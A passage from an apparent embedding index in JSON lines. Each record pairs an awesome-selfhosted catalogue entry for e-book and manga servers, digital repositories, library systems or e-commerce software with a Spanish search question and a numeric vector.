reader with user management, ratings and reviews, and metadata support [GPL-3.0, .NET/Docker]. kiwix-serve β€” HTTP daemon for serving wikis from ZIM files [GPL-3.0, C++]. Komga β€” Media server for comics/mangas/BDs with API and OPDS support, a modern web interface for exploring your libraries, as well as a web reader [MIT, Java/Docker]. MyMangaDB β€” Manga collection manager with automatic metadata, MyAnimeList import and detailed collection statistics [⚠, GPL-3.0, Docker]. Stump β€” A fast, free and open source comics, manga and digital book server with OPDS support [MIT, Rust].", "indexar": "con quΓ© puedo gestionar mi colecciΓ³n de mangas y e-books incluyendo sus metadatos y reseΓ±as", "v": [0.04732, 0.22133, -0.04105, 0.02106, -0.05855, -0.01699, -0.09425, 0.09594, -0.19708, -0.14881, -0.09005, -0.10808, 0.0659, 0.01629, 0.05005, 0.05336, 0.11502, -0.04597, 0.04122, 0.06341, 0.04109, -0.07797, -0.06139, -0.02762, -0.00758, -0.08845, 0.12538, -0.01113, 0.03977, 0.10456, -0.03675, 0.02765, 0.03886, -0.11961, -0.03082, -0.06381, 0.00323, 0.13222, -0.00124, -0.04217, -0.01535, 0.03835, -0.05916, -0.02157, 0.11558, -0.11021, 0.07106, 0.06466, -0.03835, 0.04737, -0.08367, 0.04063, -0.16961, 0.05543, 0.10001, -0.08973, -0.01018, -0.00624, 0.07724, 0.08912, -0.01872, 0.12911, 0.02869, -0.01885, 0.0454, -0.05414, -0.03933, -0.07894, -0.04272, 0.06901, -0.08598, 0.00531, -0.04233, -0.0403, -0.0121, -0.0234, -0.01391, 0.03925, 0.07001, 0.04311, 0.06558, -0.11393, -0.00853, -0.02394, 0.03322, -0.05776, -0.02186, -0.12836, 0.05025, -0.0101, -0.05836, -0.17256, -0.13918, -0.11614, -0.02357, 0.02095, -0.00405, 0.04377, 0.07779, 0.06627, 0.034, 0.06169, -0.02795, 0.09471, -0.09695, 0.0064, 0.00955, -0.02874, 0.03734, -0.04825, -0.03314, 0.02575, -0.02443, -0.01103, -0.03235, -0.02996, 0.00539, -0.04244, 0.10368, 0.04368, -0.14852, -0.0942, -0.01393, 0.04185, 0.10384, 0.05591, 0.09144, 0.04431, 0.04331, -0.05422, -0.04621, -0.0306, 0.00718, -0.065, 0.0579, -0.03628, -0.09545, 0.06556, -0.01131, -0.09916, 0.00496, 0.02964, 0.04776, 0.10007, 0.08112, -0.0683, -0.07963, -0.01842, 0.06713, -0.01739, -0.00396, -0.0307, 0.10667, 0.07693, 0.0413, 0.0232, 0.0821, -0.03747, 0.01029, -0.02393, 0.04818, 0.06744, -0.00017, 0.05211, -0.02482, 0.0042, 0.01184, -0.02883, 0.01918, 0.02073, -0.00911, 0.03476, -0.08518, -0.00691, 0.06959, -0.04596, -0.05622, -0.05326, 0.05736, 0.08174, -0.0624, -0.00305, -0.00829, -0.00218, -0.10021, -0.05118, -0.01935, -0.00591, 0.00979, -0.0197, 0.00458, 0.04246, 0.05068, -0.00877, 0.03347, -0.02662, -0.09623, 0.06464, -0.01385, -0.06006, -0.07516, 0.01225, -0.05447, 0.0442, 0.06138, 0.00137, -0.06314, 0.16126, 0.01381, -0.02245, 0.01839, 8e-05, 0.03188, 0.00027, -0.04624, -0.05956, -0.02055, 0.03563, 0.00181, 0.02297, 0.02655, -0.00111, 0.10109, -0.00348, 0.01317, -0.02774, 0.06708, -0.01966, 0.071, 0.02487, -0.02436, 0.00833, -0.01893, -0.01103, -0.05631, 0.01229, 0.11854, 0.00374, -0.01658, -0.01046, 0.03555, 0.04007, 0.01993, -0.0289, -0.00633, -0.02072, -0.05807, 0.0862, -0.05276, -0.03573, -0.01923, 0.05121, 0.02005, -0.02233, 0.09675, -0.05751]} +{"tipo": "pregunta", "herramienta": "Document Management - E-books", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Document Management - E-books", "tema": "document management - e-books", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Document Management - E-books: Kapowarr β€” Build and manage a comic book library. Download, rename, move and convert issues of the volume to your liking [GPL-3.0, Docker/Python]. Kavita β€” Cross-platform e-book/manga/comic/pdf server and web reader with user management, ratings and reviews, and metadata support [GPL-3.0, .NET/Docker]. kiwix-serve β€” HTTP daemon for serving wikis from ZIM files [GPL-3.0, C++]. Komga β€” Media server for comics/mangas/BDs with API and OPDS support, a modern web interface for exploring your libraries, as well as a web reader [MIT, Java/Docker]. MyMangaDB β€” Manga collection manager with automatic metadata, MyAnimeList import and detailed collection statistics [⚠, GPL-3.0, Docker]. Stump β€” A fast, free and open source comics, manga and digital book server with OPDS support [MIT, Rust].", "indexar": "cual es una alternativa libre a los servicios web para leer cΓ³mics desde cualquier dispositivo", "v": [-0.00068, 0.10152, -0.06165, -0.053, -0.06677, -0.10313, -0.05356, 0.03806, -0.12968, -0.09505, -0.10901, -0.21283, -0.12576, -0.04315, 0.10612, -0.09523, 0.08578, -0.14549, 0.12803, -0.0199, 0.01363, -0.01633, -0.11809, -0.00902, -0.00031, -0.11077, 0.05747, -0.04672, -0.09457, 0.04259, -0.05121, -0.02265, 0.06992, -0.03942, -0.14771, 0.03245, 0.1363, 0.09419, 0.06655, 0.0304, 0.02215, -0.09764, -0.05777, 0.05827, -0.00049, -0.02831, -0.03956, -0.05047, -0.0271, 0.03179, -0.02435, 0.02257, -0.12884, 0.01919, -0.06881, -0.07662, 0.19285, -0.11363, -0.07662, -0.06925, -0.08002, -0.00819, -0.05244, -0.0839, 0.03545, 0.06648, -0.08426, 0.07109, -0.02056, 0.03581, 0.01671, -0.05768, 0.01634, -0.0107, 0.00097, 0.06386, -0.16294, -0.05615, 0.0752, 0.01141, 0.10804, -0.04289, -0.0342, -0.00846, 0.01049, 0.00346, -0.00985, -0.07591, 0.03067, 0.01624, 0.08676, 0.10734, -0.08176, 0.03313, -0.09929, -0.05136, 0.04242, 0.01889, 0.03712, 0.02867, 0.10304, 0.03283, -0.13957, 0.01151, -0.03362, -0.03836, 0.01948, 0.01366, -0.07279, -0.0248, -0.03019, -0.04687, 0.01447, 0.02148, -0.11182, -0.06211, -0.04482, -0.01664, 0.07301, -0.02066, -0.03459, 0.00599, -0.00462, 0.01164, 0.12508, 0.04677, 0.08084, -0.01512, -0.01229, -0.05476, 0.06896, -0.09672, -0.07355, -0.0772, -0.03562, 0.00259, 0.00768, 0.02129, 0.00093, 0.04194, 0.11575, 0.0249, -0.00839, 0.0348, 0.06669, -0.11234, 0.00779, -0.0169, -0.01879, -0.03561, -0.08897, 0.00794, -0.00157, 0.07671, -0.02467, 0.0529, -0.06532, -0.0962, -0.01775, 0.07657, 0.03637, 0.00565, 0.10192, 0.0082, -0.07964, -0.00598, -0.05323, -0.01563, -0.02096, 0.04875, -0.1039, 0.11784, 0.04211, -0.06146, 0.12701, -0.03958, -0.06216, -0.01261, 0.07849, -0.03776, -0.00468, -0.00735, -0.03782, -0.02363, -0.07416, -0.06893, 0.02312, -0.01958, 0.01815, -0.04051, -0.01645, 0.00714, -0.06009, 0.04221, 0.0343, -0.04654, -0.10377, -0.06558, -0.00525, -0.052, -0.11904, 0.01944, 0.00123, 0.00055, -0.04983, 0.00092, 0.0325, 0.00506, -0.05369, 0.04933, -0.00434, -0.00868, 0.08046, -0.00512, -0.02373, -0.06662, 0.05026, -0.04626, -0.02401, 0.00404, 0.03293, -0.01433, 0.02363, -0.0051, -0.04773, 0.04438, 0.06242, 0.04582, -0.01169, 0.00696, -0.01609, 0.02548, 0.01504, 0.0287, 0.00504, 0.01664, 0.05108, 0.02879, -0.05237, -0.00291, 0.03161, 0.07833, -0.00893, 0.01608, -0.02096, -0.04413, -0.10471, 0.02902, -0.07084, -0.08859, -0.01526, 0.08332, 0.06139, 0.0008, 0.02964, 0.01125]} +{"tipo": "pregunta", "herramienta": "Document Management - Institutional Repository and Digital Library Software", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Document Management - Institutional Repository and Digital Library Software", "tema": "document management - institutional repository and digital library software", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Document Management - Institutional Repository and Digital Library Software: DSpace β€” Turnkey repository application providing durable access to digital resources [BSD-3-Clause, Java]. EPrints β€” Digital document management system with a flexible metadata and workflow model primarily aimed at academic institutions [GPL-3.0, Perl]. Fedora Commons Repository β€” Robust and modular repository system for the management and dissemination of digital content especially suited for digital libraries and archives, both for access and preservation [Apache-2.0, Java]. InvenioRDM β€” Highly scalable turn-key research data management platform with a beautiful user experience [MIT, Python]. Islandora β€” Drupal module for browsing and managing Fedora-based digital repositories [GPL-3.0, PHP]. Samvera Hyrax β€” Front-end for the Samvera framework, which itself is a Ruby on Rails application for browsing and managing Fedora-based digital repositories [Apache-2.0, Ruby].", "indexar": "quΓ© software sirve para crear un repositorio institucional de documentos", "v": [-0.01668, 0.01581, -0.10704, -0.2011, 0.14095, -0.21538, 0.05187, -0.14829, -0.11242, -0.03733, -0.06962, -0.05604, 0.06664, -0.19421, -0.02603, -0.02002, 0.179, -0.16534, -0.0047, 0.0078, 0.00589, 0.0009, -0.02101, 0.02657, -0.04394, -0.05478, -0.01103, -0.06987, -0.03788, 0.02209, 0.0399, 0.04927, 0.00498, -0.0777, -0.16203, 0.03699, 0.04874, 0.06716, -0.19307, 0.11003, 0.08865, 0.01623, -0.03858, 0.13317, -0.05552, 0.03069, 0.07422, 0.03168, -0.01882, 0.0663, -0.00961, -0.12817, -0.00399, 0.06455, -0.00223, -0.11681, 0.04508, -0.16141, 0.00985, -0.0451, -0.20626, 0.08055, 0.00911, 4e-05, -0.02455, -0.01601, -0.01535, -0.11784, -0.09242, 0.01526, -0.05307, -0.02968, 0.12603, -0.03342, -0.06712, -0.00774, -0.10756, -0.06177, -0.0735, 0.0586, 0.0266, 0.05446, -0.05731, 0.02114, -0.05415, -0.12049, 0.06204, 0.02544, 0.10987, -0.03323, -0.08192, 0.05101, -0.04704, 0.01641, 0.03579, -0.02078, 0.07011, 0.00171, -0.01748, 0.05468, -0.10031, -0.0429, -0.05741, 0.01091, -0.05362, -0.02076, 0.02807, -0.07357, -0.01608, 0.02832, 0.03059, 0.08376, -0.01779, 0.09295, 0.00524, -0.00423, 0.02154, -0.06134, 0.04114, -0.02413, 0.07118, -0.00919, -0.05, 0.01151, -0.03298, -0.05027, 0.05707, 0.05773, -0.03663, 0.02293, 0.0394, -0.09589, -0.09713, -0.00253, -0.03032, -0.01926, 0.04822, -0.09921, 0.01444, -0.00772, 0.04834, 0.00678, -0.02371, -0.00695, 0.0111, -0.05422, 0.05296, 0.0119, 0.01379, -0.04856, -0.01508, -0.04469, -0.01423, -0.00162, -0.13381, -0.00016, -0.00254, -0.03254, -0.12137, -0.00262, -0.04316, 0.04266, -0.06489, 0.04588, 0.01544, -0.02085, -0.0425, 0.07298, 0.05708, 0.0619, 0.04065, 0.02986, 0.00516, -0.15759, 0.02176, -0.07795, -0.01803, -0.05356, -0.01002, -0.02693, -0.07399, -0.03163, 0.0555, 0.04449, -0.01477, -0.03894, 0.01232, -0.05591, 0.03498, -0.02917, -0.03453, 0.01956, -0.03423, -0.03781, 0.06996, -0.01564, -0.03875, -0.02908, 0.0484, -0.04023, -0.05245, -0.02017, -0.05309, -0.00267, 0.01677, 0.04755, -0.05189, 0.01589, -0.02368, 0.06931, -0.02323, 0.04327, 0.06652, 0.03969, -0.09079, -0.01993, -0.00085, 0.04333, 0.01988, -0.05559, 0.04536, -0.05217, 0.04171, -0.00053, 0.04437, -0.01788, 0.02675, 0.03442, -0.00758, -0.02428, 0.00566, -0.01145, -0.01015, -0.00299, 0.00656, -0.01959, 0.00092, -0.0185, -0.01952, -0.06449, 0.0021, 0.08241, -0.05237, -0.07092, -0.03854, -0.02471, 0.01349, -0.01487, -0.01197, -0.01358, -0.01479, 0.004, 0.07941, 0.02458, -0.01705, -0.0467]} +{"tipo": "pregunta", "herramienta": "Document Management - Institutional Repository and Digital Library Software", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Document Management - Institutional Repository and Digital Library Software", "tema": "document management - institutional repository and digital library software", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Document Management - Institutional Repository and Digital Library Software: DSpace β€” Turnkey repository application providing durable access to digital resources [BSD-3-Clause, Java]. EPrints β€” Digital document management system with a flexible metadata and workflow model primarily aimed at academic institutions [GPL-3.0, Perl]. Fedora Commons Repository β€” Robust and modular repository system for the management and dissemination of digital content especially suited for digital libraries and archives, both for access and preservation [Apache-2.0, Java]. InvenioRDM β€” Highly scalable turn-key research data management platform with a beautiful user experience [MIT, Python]. Islandora β€” Drupal module for browsing and managing Fedora-based digital repositories [GPL-3.0, PHP]. Samvera Hyrax β€” Front-end for the Samvera framework, which itself is a Ruby on Rails application for browsing and managing Fedora-based digital repositories [Apache-2.0, Ruby].", "indexar": "con quΓ© programa puedo gestionar una biblioteca digital en academia", "v": [-0.0391, 0.00309, -0.03308, -0.18744, -0.02133, -0.10095, -0.05364, 0.04302, -0.18891, -0.07636, -0.01047, -0.15591, -0.08479, -0.02963, 0.02555, -0.0833, 0.13491, -0.14961, 0.06147, 0.01223, 0.09657, 0.07647, -0.01754, 0.01275, 0.10333, -0.07524, 0.0727, 0.03559, 0.01656, 0.10872, 0.00242, 0.01941, 0.09097, -0.14867, 0.02199, 0.03284, 0.06326, 0.08924, 0.02267, 0.01963, -0.07895, 0.12616, 0.03698, 0.0503, 0.06793, -0.00819, 0.13254, -0.03405, -0.06325, -0.01546, -0.10485, -0.03086, 0.04062, 0.05543, 0.06165, -0.05252, -0.01668, -0.13428, -0.0084, -0.09602, -0.04957, 0.06889, -0.03455, -0.02929, 0.0922, 0.04301, 0.09319, 0.03106, -0.1844, 0.10066, -0.02419, -0.0341, -0.0253, 0.03098, -0.13612, 0.09375, -0.01137, -0.04213, 0.05119, -0.12789, -0.05807, -0.02876, 0.05969, 0.02458, -0.10041, -0.036, -0.01577, -0.05392, 0.05763, 0.01838, -0.09715, 0.09054, -0.11958, -0.03523, 0.09966, -0.06131, 0.0433, 0.00632, -0.05395, 0.07001, -0.00839, 0.07834, -0.06158, 0.08077, -0.10909, 0.0418, -0.03942, -0.03029, -0.01257, -0.04575, -0.03402, -0.05103, -0.03393, -0.0164, -0.04617, 0.0613, 0.09089, -0.00713, 0.08949, 0.02301, -0.1197, -0.0069, -0.02385, -0.04007, 0.10975, 0.09467, 0.11798, 0.02373, 0.02348, -0.00449, -0.01898, -0.0063, -0.0297, -0.06541, -0.06441, -0.00673, -0.05193, -0.09024, -0.03753, -0.08254, -0.04668, 0.02796, 0.01844, -0.00521, -0.04326, -0.16285, 0.06366, -0.03947, -0.01795, 0.00478, -0.02959, -0.06245, 0.03812, 0.06512, -0.0878, 0.07139, 0.07249, -0.0699, -0.08439, -0.00755, -0.03127, 0.01427, -0.00631, -0.05428, -0.01953, -0.0301, 0.03287, 0.02602, 0.03348, 0.08377, -0.07025, 0.02461, 0.02039, -0.02623, 0.00201, -0.01699, -0.0097, -0.06574, 0.09881, 0.06461, -0.1139, -0.02603, 0.06402, -0.00768, -0.07587, -0.03662, -0.0612, 0.02517, -0.04013, -0.0142, -0.01233, 0.02119, -0.01229, -0.00737, 0.05613, -0.04313, -0.04826, 0.07691, 0.03053, -0.03036, -0.00468, 0.04033, 0.03313, 0.06759, 0.03892, 0.05151, -0.0161, 0.04271, 0.0132, 0.01335, -0.02129, 0.00636, 0.03357, -0.01296, -0.06639, -0.0454, -0.06643, 0.09061, 0.01206, -0.07237, 0.0235, -0.03651, 0.05882, 0.02696, 0.04915, -0.05671, 0.02108, 0.03514, 0.00979, 0.03337, -0.01234, -0.09427, 0.00126, 0.04379, 0.02079, 0.00422, 0.04241, 0.03077, -0.06388, 0.00884, -0.04448, 0.06092, 0.00176, 0.00086, 0.01192, 0.00749, -0.11637, 0.06584, -0.02936, -0.00969, -0.02024, 0.01267, 0.03079, -0.00297, 0.01493, 0.05109]} +{"tipo": "pregunta", "herramienta": "Document Management - Integrated Library Systems (ILS)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Document Management - Integrated Library Systems (ILS)", "tema": "document management - integrated library systems (ils)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Document Management - Integrated Library Systems (ILS): Evergreen β€” Highly-scalable software for libraries that helps library patrons find library materials, and helps libraries manage, catalog, and circulate those materials [GPL-2.0, PLpgSQL]. Koha β€” Enterprise-class ILS with modules for acquisitions, circulation, cataloging, label printing, offline circulation for when Internet access is not available, and much more [GPL-3.0, Perl]. RERO ILS β€” Large-scale ILS that can be run as a service with consortial features, intended primarily for library networks. Includes most standard modules (circulation, acquisitions, cataloging,...) and a web-based public and professional interface [AGPL-3.0, Python/Docker].", "indexar": "que programa de gestiΓ³n bibliotecaria escala bien para grandes redes?", "v": [-0.05405, -0.0834, -0.06461, -0.21808, 0.00847, -0.08888, -0.11234, -0.04955, -0.03026, -0.18308, 0.01054, -0.0742, -0.03135, -0.0056, 0.10908, -0.04203, -0.04976, -0.026, 0.16667, -0.09355, 0.01301, 0.1054, -0.01275, 0.01947, -0.02382, -0.05143, 0.05951, -0.025, -0.00088, 0.09328, 0.0279, -0.01901, 0.06017, -0.15954, 0.0127, 0.07726, 0.0674, 0.035, 0.01563, -0.07058, -0.05266, 0.08351, 0.0426, -0.01307, 0.10782, -0.04074, 0.09225, -0.00018, -0.0527, -0.04015, -0.13603, -0.04477, 0.02158, -0.02452, 0.08555, -0.10183, 0.03879, -0.08019, -0.03309, -0.04902, -0.04165, -0.04647, -0.02076, -0.1009, 0.07375, -0.03652, 0.01312, 0.08166, -0.07598, 0.09306, -0.056, 0.01618, 0.08514, 0.02192, -0.04194, 0.09781, 0.04442, 0.03861, 0.02654, 0.00821, -0.0198, -0.04909, -0.00724, 0.03014, -0.09899, 0.0147, 0.03433, -0.09591, 0.0806, 0.04642, -0.07263, -0.03792, -0.13438, -0.08648, 0.15059, -0.05138, 0.0671, -0.06612, 0.04096, 0.05856, -0.03321, -0.01559, -0.04991, 0.08397, -0.03526, 0.1084, -0.00101, -0.08383, 0.04723, -0.07318, 0.05605, 0.0296, 0.01234, -0.05035, -0.11612, 0.00628, 0.04132, -0.00593, 0.05025, 0.00703, -0.16326, -0.00318, -0.05574, -0.03483, 0.13451, 0.03912, 0.05412, 0.086, 0.07475, 0.03394, -0.0012, 0.01911, -0.02883, -0.02596, -0.08265, -0.03691, -0.09895, -0.14289, -0.00199, -0.14297, -0.05976, 0.03504, -0.03865, -0.04853, -0.02992, -0.07788, 0.08536, -0.07043, -0.02487, 0.0274, 0.02697, 0.02362, 0.01382, 0.07162, -0.04359, 0.07144, 0.00766, -0.06996, -0.11717, -0.00729, -0.04989, -0.04639, 0.01598, -0.04104, -0.04864, -0.00346, 0.00461, 0.07091, 0.10118, 0.0166, -0.09613, 0.05908, -0.03531, -0.04617, -0.02333, -0.03224, -0.03522, -0.03436, 0.06636, 0.05515, -0.10314, -0.02153, 0.08739, 0.00334, -0.04678, -0.11901, -0.02507, -0.00997, -0.08564, -0.02649, -0.036, 0.00161, 0.00074, 0.04006, 0.06607, -0.02409, -0.02332, 0.07606, 0.09384, -0.01806, 0.00783, -0.0198, -0.01256, 0.0739, -0.00473, 0.01619, -0.04174, 0.02894, 0.02487, 0.09651, 0.01315, -0.00375, 0.01053, -0.00959, -0.05049, -0.03718, -0.02499, 0.07244, 0.0645, -0.02128, -0.00886, 0.00396, 0.06135, 0.07696, 0.02552, -0.07162, -0.03232, -0.04492, 0.04079, -0.01234, 0.00518, -0.13478, 0.03622, 0.02285, -0.00664, -0.05529, 0.04043, 0.04465, 0.00222, -0.06146, -0.08649, 0.05305, -0.02396, 0.01447, 0.00374, -0.03063, -0.0929, 0.00391, 0.00183, -0.01085, -0.02278, -0.01953, 0.0222, -0.00343, 0.0654, -0.00986]} +{"tipo": "pregunta", "herramienta": "Document Management - Integrated Library Systems (ILS)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Document Management - Integrated Library Systems (ILS)", "tema": "document management - integrated library systems (ils)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Document Management - Integrated Library Systems (ILS): Evergreen β€” Highly-scalable software for libraries that helps library patrons find library materials, and helps libraries manage, catalog, and circulate those materials [GPL-2.0, PLpgSQL]. Koha β€” Enterprise-class ILS with modules for acquisitions, circulation, cataloging, label printing, offline circulation for when Internet access is not available, and much more [GPL-3.0, Perl]. RERO ILS β€” Large-scale ILS that can be run as a service with consortial features, intended primarily for library networks. Includes most standard modules (circulation, acquisitions, cataloging,...) and a web-based public and professional interface [AGPL-3.0, Python/Docker].", "indexar": "con quΓ© puedo montar un sistema de biblioteca con soporte offline?", "v": [0.0017, 0.11047, -0.21356, -0.16569, -0.14391, -0.07479, -0.0842, -0.02229, -0.14586, -0.13798, -0.16245, -0.03717, 0.07287, 0.02932, 0.03529, -0.03723, 0.04998, -0.10403, 0.01894, -0.03018, 0.04005, -0.00446, -0.04237, -0.019, 0.11936, 0.02244, 0.04116, -0.00322, -0.13074, 0.04915, 0.00621, 0.01694, 0.0357, 0.02012, -0.04902, -0.02912, 0.05799, 0.00133, 0.00601, -0.04996, -0.01653, -0.01531, 0.09283, 0.0908, 0.01418, -0.03861, 0.04458, -0.00858, -0.01846, 0.03162, -0.09505, -0.13391, -0.03165, -0.00912, -0.01828, -0.13415, 0.11932, -0.10835, 0.08056, -0.10071, -0.10306, 0.08193, -0.07892, -0.09264, 0.1366, 0.01999, -0.0429, 0.03521, -0.18294, 0.08226, -0.05117, -0.00826, 0.09414, 0.00575, -0.09598, 0.1263, 0.03263, -0.00822, 0.06712, 0.01516, -0.01895, 0.0344, 0.02422, 0.08959, -0.03308, -0.0075, -0.01928, -0.07285, 0.02419, 0.01918, -0.03408, 0.01401, -0.04887, -0.04448, 0.04018, -0.13343, -0.00568, -0.00754, -0.01715, 0.01119, -0.08797, 0.0172, -0.0389, 0.06247, -0.02836, -0.07561, 0.01711, -0.06441, 0.06834, -0.08753, 0.06274, 0.04186, -0.04749, 0.02968, -0.02102, -0.02585, 0.07545, 0.05125, 0.06877, 0.12009, -0.06436, 0.08612, 0.01755, -0.07222, 0.11825, 0.03822, 0.12807, 0.05015, 0.01028, -0.03247, 0.01611, -0.03908, -0.02642, -0.01668, -0.06797, 0.05361, -0.03719, -0.04759, -0.04907, -0.04325, 0.08138, -0.06083, -0.0445, -0.06753, 0.03144, -0.09278, 0.11176, -0.05442, -0.02092, -0.11646, 0.0032, 0.08121, 0.01631, -0.01632, -0.04786, 0.04616, 0.0938, -0.04341, -0.00809, 0.02084, 0.01888, 0.00068, 0.02925, -0.00898, -0.13452, -0.03904, -0.04934, -0.05259, 0.07256, 0.0377, -0.05379, 0.03698, 0.04889, -0.06928, -0.00374, -0.03278, -0.02776, -0.03746, 0.06756, 0.02315, -0.10302, -0.00235, 0.04453, -0.00402, -0.08027, -0.04978, -0.00317, -0.03439, -0.02055, -0.01788, 0.01618, 0.05142, -0.07291, 0.031, 0.05579, -0.00903, -0.02249, 0.07597, 0.0763, -0.02023, -0.01529, -0.00537, 0.02603, -0.00626, 0.02412, -0.015, -0.005, 0.05319, 0.02534, 0.0085, 0.01686, 0.02026, 0.04408, -0.01382, -0.05394, -0.00091, -0.09679, 0.02756, -0.00854, -0.09944, 0.02707, -0.02219, 0.0792, 0.06444, 0.05205, 0.01143, 0.02373, -0.00278, -0.00673, -0.03654, 0.0048, -0.13297, 0.0303, 0.03911, 0.00407, -0.05487, 0.05288, 0.0599, -0.07686, -0.00021, -0.0056, 0.08552, 0.00299, -0.03473, -0.03546, -0.04533, -0.11287, 0.0135, -0.03877, -0.07875, -0.06333, 0.01327, -0.01619, -0.03421, -0.00904, -0.02096]} +{"tipo": "pregunta", "herramienta": "Document Management - Integrated Library Systems (ILS)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Document Management - Integrated Library Systems (ILS)", "tema": "document management - integrated library systems (ils)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Document Management - Integrated Library Systems (ILS): Evergreen β€” Highly-scalable software for libraries that helps library patrons find library materials, and helps libraries manage, catalog, and circulate those materials [GPL-2.0, PLpgSQL]. Koha β€” Enterprise-class ILS with modules for acquisitions, circulation, cataloging, label printing, offline circulation for when Internet access is not available, and much more [GPL-3.0, Perl]. RERO ILS β€” Large-scale ILS that can be run as a service with consortial features, intended primarily for library networks. Includes most standard modules (circulation, acquisitions, cataloging,...) and a web-based public and professional interface [AGPL-3.0, Python/Docker].", "indexar": "cual es una alternativa libre a los sistemas tradicionales de catΓ‘logos bibliotecarios?", "v": [0.0831, -0.01096, -0.0908, -0.04139, -0.03637, -0.13528, 0.06094, -0.03872, -0.13167, -0.05757, -0.06809, -0.12572, -0.0436, 0.03703, 0.10636, -0.03265, 0.05299, -0.13269, 0.11293, -0.08176, 0.00247, -0.02393, -0.12599, 0.02424, 0.01323, -0.06641, 0.05591, -0.0109, -0.08134, 0.19389, 0.02204, 0.04029, 0.13147, -0.13035, -0.0829, 0.01617, 0.08104, 0.07343, -0.09689, -0.14298, 0.07741, -0.03026, 0.00037, 0.0424, -0.07124, -0.11005, -0.01961, 0.02686, -0.05246, 0.0132, -0.08667, -0.05815, -0.03826, 0.05851, 0.14552, -0.16262, 0.07873, 0.00804, -0.04501, -0.04866, -0.03582, 0.1346, 0.06662, -0.09894, 0.08262, -0.01802, -0.09658, 0.0163, -0.06825, 0.06057, 0.00189, 0.0081, 0.02683, 0.03191, -0.14509, 0.15207, -0.00552, -0.00395, 0.03379, 0.00832, 0.01724, -0.0877, 0.04906, 0.04507, -0.05911, -0.05476, 0.04715, -0.05281, 0.06516, -0.02934, 0.02884, -0.01325, -0.05167, 0.06308, 0.11389, -0.11867, -0.00506, 0.03951, -0.00887, 0.11472, -0.00538, 0.0563, -0.05447, 0.01955, -0.0066, -0.0782, -0.01107, -0.01279, 0.04092, -0.09965, -0.01787, 0.00676, 0.04932, -0.00176, -0.01116, -0.00167, 0.07751, 0.03284, 0.03275, 0.10667, -0.12125, -0.02993, -0.02151, -0.0809, 0.09166, 0.00844, 0.09425, 0.0415, 0.00752, 0.03204, 0.06106, -0.02209, -0.0871, -0.02488, -0.13359, -0.00137, 0.03922, -0.09421, 0.02312, -0.04776, 0.01339, -0.007, -0.01617, -0.05908, 0.02978, -0.05016, 0.08125, -0.03316, -0.00465, -0.05267, -0.07721, 0.0297, 0.01398, 0.07414, 0.01201, 0.06237, 0.00217, -0.07373, -0.06918, 0.06226, 0.03696, -0.00959, 0.06114, -0.00423, -0.12396, -0.01468, -0.00441, -0.04412, 0.04345, 0.00855, -0.0172, 0.02107, 0.00019, -0.07574, 0.02885, -0.02686, -0.04146, -0.04228, 0.1367, 0.03364, -0.11327, 0.04808, -0.07058, -0.07506, -0.05303, -0.07516, -0.02511, -0.03483, 0.01666, -0.00673, -0.02201, 0.03107, -0.08449, -0.06278, -0.02244, 0.04126, -0.03513, 0.00689, -0.01504, -0.03977, -0.02441, 0.06986, -0.0255, -0.03077, 0.02125, 0.03759, -0.02775, 0.07164, -0.0137, 0.02155, 0.02183, 0.02436, 0.05224, -0.03405, -0.09087, -0.04937, -0.03861, -0.0115, 0.00563, -0.1092, 0.0665, 0.01695, 0.09562, 0.03789, 0.03942, -0.00369, 0.04924, 0.04259, 0.00371, -0.01034, -0.00074, -0.08948, 0.01098, 0.02016, 0.03464, 0.00526, -0.00449, 0.01634, -0.03104, -0.03083, 0.0066, 0.0926, -0.05633, -0.03092, -0.01465, -0.04342, -0.12629, -0.02003, -0.00682, -0.05817, -0.05243, 0.06475, 0.00592, -0.03011, 0.02215, -0.07504]} +{"tipo": "pregunta", "herramienta": "E-commerce", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / E-commerce", "tema": "e-commerce", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / E-commerce: Aimeos β€” E-commerce framework for building custom online shops, market places and complex B2B applications scaling to billions of items with Laravel [LGPL-3.0/MIT, PHP]. Bagisto β€” Leading Laravel open source e-commerce framework with multi-inventory sources, taxation, localization, dropshipping and more exciting features [MIT, PHP]. CoreShop β€” E-commerce plugin for Pimcore [GPL-3.0, PHP]. Drupal Commerce β€” Popular e-commerce module for Drupal CMS, with support for dozens of payment, shipping, and shopping related modules [GPL-2.0, PHP]. EverShop β€” E-commerce platform with essential commerce features. Modular architecture and fully customizable [⚠, GPL-3.0, Docker/Nodejs]. Magento Open Source β€” Leading provider of open omnichannel innovation [OSL-3.0, PHP]. MedusaJs β€” Headless commerce engine that enables developers to create amazing digital commerce experiences [MIT, Nodejs]. Microweber β€” Drag and Drop CMS and online shop [MIT, PHP]. myCart β€” Shopping cart in 1 file (with support for payment by card or cryptocurrency) [⚠, MIT, Go/Docker].", "indexar": "que programa es para montar una tienda online personalizada con Laravel?", "v": [-0.05761, -0.09793, -0.21211, -0.1309, -0.17868, -0.0134, 0.10615, 0.06022, -0.07938, -0.07859, 0.00443, -0.08217, 0.15908, -0.15855, 0.04089, 0.05191, -0.02686, -0.11873, 0.17166, -0.01808, -0.01048, 0.06555, -0.14102, -0.14158, -0.06558, -0.02394, 0.09044, -0.14974, -0.00083, 0.06647, 0.03376, 0.04435, 0.02694, -0.02656, 0.03907, -0.10268, 0.01114, -0.15418, 0.02928, -0.02527, 0.14579, 0.06291, 0.06128, 0.0263, 0.03366, 0.08207, 0.11716, 